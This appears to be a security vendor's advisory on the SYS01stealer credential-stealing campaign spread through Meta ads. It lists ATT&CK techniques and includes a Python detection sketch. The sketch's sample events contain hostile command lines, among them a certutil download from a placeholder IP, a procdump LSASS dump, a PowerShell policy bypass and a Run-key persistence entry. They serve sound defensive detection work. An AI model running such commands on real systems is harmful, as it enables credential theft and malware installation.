overview

Independent cybersecurity researchers have recently uncovered an ongoing malware campaign abusing Meta’s advertising platform to distribute an information stealer known as SYS01stealer. 

SYS01stealer was first documented in 2023 by Morphisec, when it was observed targeting Facebook business accounts through fake profiles and misused Google advertisements.

Unlike ransomware, SYS01stealer’s goal is to steal login credentials, browsing history, and cookies, either to set conditions for a more damaging attack in the future or to sell them directly via dark-web forums.

The threat actors behind these campaigns will often impersonate or try to hijack legitimate brands in order to propagate their malware. Anyone who advertises via LinkedIn, Facebook, or other Meta-owned companies is advised to review their marketing materials to ensure no one is impersonating them for malicious purposes.

 

 

how avertium is protecting our customers

 

IOCs ADDED TO OUR THREAT FEEDS

NOTE: Avertium is actively searching across all monitored environments for the IoCs listed below. If any are discovered, we will reach out to you directly. If your environment or portions of your environment are not currently being monitored, please reach out to your Service Delivery Manager.


 

TTPs TO MONITOR

  1. T1003 - Credential Dumping: SYS01stealer often attempts to steal credentials from memory, databases, or other storage. This includes dumping credentials from processes like LSASS (Local Security Authority Subsystem Service), which contains user authentication information. Attackers may use tools like rundll32 and procdump to facilitate this.
  2. T1059.001 - PowerShell: SYS01stealer leverages PowerShell scripts to execute various commands, including credential theft activities. These scripts may use bypass techniques to avoid detection by security software. (Source: Microsoft Sentinel 101)
  3. T1071.001 - Application Layer Protocol: Web Protocols: SYS01stealer communicates with command-and-control (C2) servers to exfiltrate credentials. This is often done over common web protocols, such as HTTP or HTTPS, to avoid detection by blending in with normal web traffic. (Source: Microsoft Sentinel 101)
  4. T1140 - Deobfuscate/Decode Files or Information: To evade detection, SYS01stealer may obfuscate parts of its payload or encode the data it exfiltrates. The malware then decodes it before or during execution, a common technique used to hide malicious code. (Source: SentinelOne)
  5. T1105 - Ingress Tool Transfer: Attackers often use certutil.exe to download additional malicious payloads, including credential theft tools, from a remote server. This is a common pattern observed in campaigns using SYS01stealer. (Source: Microsoft Sentinel 101)
  6. T1547 - Boot or Logon Autostart Execution: To maintain persistence, SYS01stealer may create scheduled tasks or modify registry keys that allow it to execute during system startup, ensuring it has ongoing access to steal credentials. (Source: Microsoft Sentinel 101)
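
As an added illustration (not Avertium's detection content), the sketch below turns the process-level TTPs above into simple rules and runs them over constructed process-creation events. The event layout (host, image path, command line), the host names, the file paths and the rule patterns are all assumptions made for this example; benign certutil and schtasks invocations are included to show what the rules should leave alone.

```python
import ntpath
import re

# One rule per monitored behaviour: (technique ID as labelled in the list above,
# process image names, command-line pattern). Patterns are illustrative.
RULES = [
    ("T1003", {"rundll32.exe", "procdump.exe", "procdump64.exe"},
     re.compile(r"\blsass\b", re.I)),                       # dump tool aimed at LSASS
    ("T1059.001", {"powershell.exe", "pwsh.exe"},
     re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I)),          # execution-policy bypass
    ("T1105", {"certutil.exe"}, re.compile(r"https?://", re.I)),  # certutil given a URL
    ("T1547", {"schtasks.exe"}, re.compile(r"/create\b", re.I)),  # new scheduled task
    ("T1547", {"reg.exe"},
     re.compile(r"\badd\b.*\\currentversion\\run", re.I)),  # Run-key autostart
]

# Constructed sample events: (host, image path, command line).
EVENTS = [
    ("ws01", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -f http://203.0.113.10/u.bin C:\Users\Public\u.bin"),
    ("ws01", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -hashfile C:\Temp\setup.exe SHA256"),   # benign use, no URL
    ("ws02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\s.ps1"),
    ("ws02", r"C:\Tools\procdump64.exe",
     r"procdump64.exe -accepteula lsass.exe C:\Temp\out.dmp"),
    ("ws03", r"C:\Windows\System32\schtasks.exe",
     r"schtasks.exe /query /fo LIST"),                      # benign, read-only
    ("ws03", r"C:\Windows\System32\reg.exe",
     r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d C:\Users\Public\u.exe"),
]


def detect(events):
    """Return (host, technique, command_line) for every event a rule matches."""
    hits = []
    for host, image, cmdline in events:
        exe = ntpath.basename(image).lower()  # parse Windows paths on any OS
        for technique, images, pattern in RULES:
            if exe in images and pattern.search(cmdline):
                hits.append((host, technique, cmdline))
    return hits


if __name__ == "__main__":
    for host, technique, cmdline in detect(EVENTS):
        print(f"{host}\t{technique}\t{cmdline}")
```

In a real deployment the same conditions would be expressed in the SIEM's own query language against process-creation telemetry, with allow-lists for known administrative use.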

 

 

additional recommendations

The most common vector of compromise for this kind of attack is “Drive-by Compromise”, which involves luring a victim to an attacker-controlled website and tricking them into downloading malicious files. Educating users is one of the most effective defenses against this technique. Training employees to verify URLs, avoid clicking on unknown links, and report suspicious messages can significantly reduce the chances of falling victim to it.

 

 

ADDITIONAL SERVICE OFFERINGS

  • Fusion MXDR is the first MDR offering that fuses together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts.
  • Security Information and Event Management (SIEM) - Minimizing the impact of a successful ransomware or malware attack requires detecting it as early in the attack as possible. A Security Information and Event Management (SIEM) system can help an organization to accomplish this. Avertium offers a comprehensive SIEM-based approach that increases the potential for detecting a ransomware infection before it deploys. SIEM provides a holistic overview of a company’s IT environment from a single point of view in terms of its specific security events, empowering teams to detect and analyze unusual behavior. 
  • Avertium aligns your Cybersecurity Strategy with your business strategy, ensuring that your investment in security is also an investment in your business. Our Cybersecurity Strategy service includes:  
    • Strategic Security Assessments - Strengthening your security posture begins with knowing where your current program stands (NIST CSF, Security Architecture, Business Impact Analysis, Sensitive Data Inventory, Network Virtualization and Cloud Assessment). 
    • Threat Mapping – Leverage Avertium’s Cyber Threat Intelligence, getting a more informed view of your most likely attack scenarios (Threat Assessment and MITRE ATT&CK). 
    • Cyber Maturity Roadmap - Embrace a comprehensive, quantifiable, and well-organized approach to establishing and continuously enhancing your cybersecurity resilience (Policy + Procedure Development, Virtual CISO (VCISO), Training + Enablement, Tabletop Exercises, and Business Continuity + Disaster Recovery Plan).




 
